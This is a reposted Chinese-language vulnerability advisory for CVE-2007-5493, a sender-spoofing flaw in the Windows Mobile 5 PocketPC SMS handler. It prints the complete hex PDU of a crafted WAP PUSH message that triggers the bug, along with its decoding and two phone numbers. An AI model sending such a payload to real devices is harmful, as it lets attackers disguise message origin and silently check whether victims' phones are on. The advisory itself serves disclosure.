黑客联盟[民间公益非盈利]尚武精神

点赞 | 给我建议 | | 登录

首页 » 黑客新闻 » 最新漏洞 » 微软 Windows Mobile存在短信处理器来源迷惑漏洞

微软 Windows Mobile存在短信处理器来源迷惑漏洞

10-09-29 13:27 0 RSS 2.0

受影响系统：

Microsoft Windows Mobile 5 PocketPC

描述：

BUGTRAQ ID: 26091
CVE(CAN) ID: CVE-2007-5493

Windows Mobile是微软开发的用于手机的操作系统。

Windows Mobile的短信处理器中存在安全漏洞，如果发送了特制的WAP PUSH消息的话，就可能在接收者的手机上隐藏原始短信的发送者。

原始PDU如[1]所示，以下PDU会导致Pocket PC电话版本的SMS处理器错误的解码PDU，这样发送者的手机号码和发送时间都是错误的。

[1] PDU（自动换行）
  079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
  AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
  756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
  696C652E636F6D000101

PDU的解码请见[2]。当SmartPhone接收到这条消息的时候，就会未经交互便将其丢弃，这也允许攻击者未经短信接收者确认便可以判断对方手机是否打开。

[2] PDU解码

  PDU LENGTH IS 118 BYTES
  ADDRESS OF DELIVERING SMSC
    NUMBER IS : +447785016005
    TYPE OF NR. : International
    NPI : ISDN/Telephone (E.164/163)

  MESSAGE HEADER FLAGS
    MESSAGE TYPE : SMS SUBMIT
    REJECT DUPLICATES : NO
    VALIDITY PERIOD : RELATIVE
    REPLY PATH : NO
    USER DATA HEADER : PRESENT
    REQ. STATUS REPORT : NO
    MSG REFERENCE NR. : 34 (0×22)

  DESTINATION ADDRESS
    NUMBER IS : +447716299660
  TYPE OF NR. : International
    NPI : ISDN/Telephone (E.164/163)

  PROTOCOL IDENTIFIER (0×00)
    MESSAGE ENTITIES : SME-to-SME
    PROTOCOL USED : Implicit / SC-specific

   DATA CODING SCHEME (0×04)
    AUTO-DELETION : OFF
    COMPRESSION : OFF
    MESSAGE CLASS : NONE
    ALPHABET USED : 8bit data

VALIDITY OF MESSAGE : 24.0 hrs

   USER DATA PART OF SM
    USER DATA LENGTH : 96 octets
    UDH LENGTH : 6 octets
    UDH : 05 04 0B 84 23 F0
    UDH ELEMENTS : 05 – Appl. port addressing 16bit
       4 (0×04) Bytes Information Element
         09200 : SOURCE port is: allocated by IANA
        02948 : DESTINATION port is: allocated by IANA
     — DATA ———————-
       05 04 0B 84 23 F0
       USER DATA (TEXT) : %®ê¯‚´„jEÆ
     symantec…Symantec
       bulkSMS (Unregistered Ver) -
       LogixMobile.com

厂商补丁：

Microsoft

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

Linux Audit audit_log_user_command 栈溢出漏洞 MS07-061：Windows URI处理中的远程执行代码漏洞